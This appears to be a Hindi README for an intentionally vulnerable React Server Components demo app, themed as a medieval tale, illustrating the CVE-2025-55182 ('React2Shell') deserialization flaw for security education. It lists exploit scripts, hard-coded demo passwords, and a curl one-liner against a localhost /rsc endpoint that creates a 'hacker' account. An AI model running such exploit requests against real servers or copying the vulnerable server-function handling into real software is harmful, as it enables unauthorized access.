
"एक समय की बात है, Reactland का किला सभी Flight संदेशों पर भरोसा करता था... जब तक The Imposter नहीं आया।" एक कथात्मक CVE-2025-55182 (React2Shell) डेमो - सुरक्षा शिक्षा के लिए मध्ययुगीन-थीम वाला संवेदनशील React Server Components ऐप।
यह परियोजना React Server Components 19.1.1 में एक गंभीर RCE भेद्यता (CVE-2025-55182 / React2Shell) प्रदर्शित करती है।
यह परियोजना CVE-2025-55182 (React2Shell) प्रदर्शित करती है, जो React Server Components 19.1.1 में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। एप्लिकेशन में शामिल हैं:
react-cve-demo/
├── package.json # React 19.1.1 with react-server-dom-webpack
├── server.js # Custom React server with RSC support
├── src/
│ ├── App.jsx # Main React component
│ ├── Login.jsx # Login page component
│ ├── Dashboard.jsx # Protected page component
│ └── server-components/ # Server Components
│ └── AuthServer.jsx # Server-side auth logic
├── data/
│ └── users.json # User credentials storage
├── Dockerfile # Docker containerization
├── docker-compose.yml # Docker Compose setup
├── .dockerignore
├── exploit/
│ ├── poc.js # POC exploit script (Node.js)
│ └── poc.sh # POC exploit script (bash/curl)
└── README.md # This file
npm install
npm start
Docker Compose के साथ बिल्ड और रन करें:
docker-compose up --build
या मैन्युअल रूप से बिल्ड और रन करें:
docker build -t react-cve-demo .
docker run -p 3000:3000 react-cve-demo
http://localhost:3000 पर एप्लिकेशन तक पहुँचें
admin, पासवर्ड: securepassword123user1, पासवर्ड: password123यह भेद्यता RSC Flight प्रोटोकॉल के डिसीरियलाइज़ेशन (deserialization) तंत्र में मौजूद है। एक्सप्लॉइट:
node exploit/poc.js
या कस्टम टारगेट URL के साथ:
TARGET_URL=http://localhost:3000 node exploit/poc.js
./exploit/poc.sh
या कस्टम टारगेट URL के साथ:
TARGET_URL=http://localhost:3000 ./exploit/poc.sh
एक-पंक्ति संस्करण:
curl -X POST http://localhost:3000/rsc -H "Content-Type: application/json" -d '{"action":"callServerFunction","payload":{"moduleId":"AuthServer","functionName":"validateLogin","args":["hacker","hacked123"]}}'
बहु-पंक्ति संस्करण (पठनीयता के लिए):
curl -X POST http://localhost:3000/rsc \
-H "Content-Type: application/json" \
-d '{"action":"callServerFunction","payload":{"moduleId":"AuthServer","functionName":"validateLogin","args":["hacker","hacked123"]}}'
नोट: एक कॉपी-पेस्ट तैयार एक-पंक्ति कमांड
exploit/curl-oneline.txtमें भी उपलब्ध है
एक्सप्लॉइट चलाने के बाद:
data/users.json में एक नया उपयोगकर्ता बनाता हैhackerhacked123यह भेद्यता React Server Components 19.1.1 में मौजूद है, विशेष रूप से:
react-server-dom-webpackसर्वर (server.js) निम्नलिखित लागू करता है:
/rsc)data/users.json)RSC Flight प्रोटोकॉल एंडपॉइंट निम्नलिखित स्वीकार करता है:
action: "callServerFunction": सर्वर फ़ंक्शन निष्पादित करेंaction: "renderRSC": React Server Components रेंडर करेंयह भेद्यता इस बात में मौजूद है कि सर्वर फ़ंक्शन कॉल्स को कैसे डिसीरियलाइज़ और निष्पादित किया जाता है।
npm install)docker-compose logsMIT लाइसेंस - केवल शैक्षिक उद्देश्यों के लिए
यह सॉफ़्टवेयर केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक और योगदानकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग या हानि के लिए जिम्मेदार नहीं हैं। अपने जोखिम पर उपयोग करें और सभी लागू कानूनों और विनियमों का अनुपालन सुनिश्चित करें।